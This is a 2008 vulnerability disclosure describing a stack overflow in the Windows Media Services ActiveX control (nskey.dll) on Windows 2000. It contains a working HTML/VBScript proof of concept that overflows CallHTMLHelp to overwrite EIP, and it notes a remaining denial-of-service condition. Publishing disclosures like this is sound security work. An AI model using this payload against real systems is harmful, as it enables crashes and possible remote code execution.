wms-overflow.txt
Posted on 22 August 2008
Product: Windows Media Services (nskey.dll) Products affected/tested: Windows 2000 Server Windows 2000 Advanced Server Windows 2000 Datacenter Edition Attack: Stack Overflow Technical Details: Via an activex control that is safe for scripting/initilize, passing atleast 9752 bytes to CallHTMLHelp will overwrite the EIP and remote code execution may be possible. PoC exploit: <html><body> <object id=target classid=clsid:2646205B-878C-11D1-B07C-0000C040BCDB></object> <script language=vbscript> arg1=String(9752, "A") target.CallHTMLHelp arg1 </script> </body></html> This PoC should work fine and overwrite the EIP, hitting 0x41414141 of course. Now for the part for why I released this information... Apprently this issue has been very silently fixed (I cannot find ANY information ANYWHERE for or relating to it) by Microsoft a few patches ago. And.. WINDOWS 2000 IS OLD. Widely used, but still pretty old for a modern operating system. This bug was pretty exploitable until I used Windows Up2date :( But, to no surprise, they didn't fix the bug completely. Theres still a DoS after putting about 525,000 bytes in the buffer. Oh well :) Jeremy Brown (0xjbrown41@gmail.com)
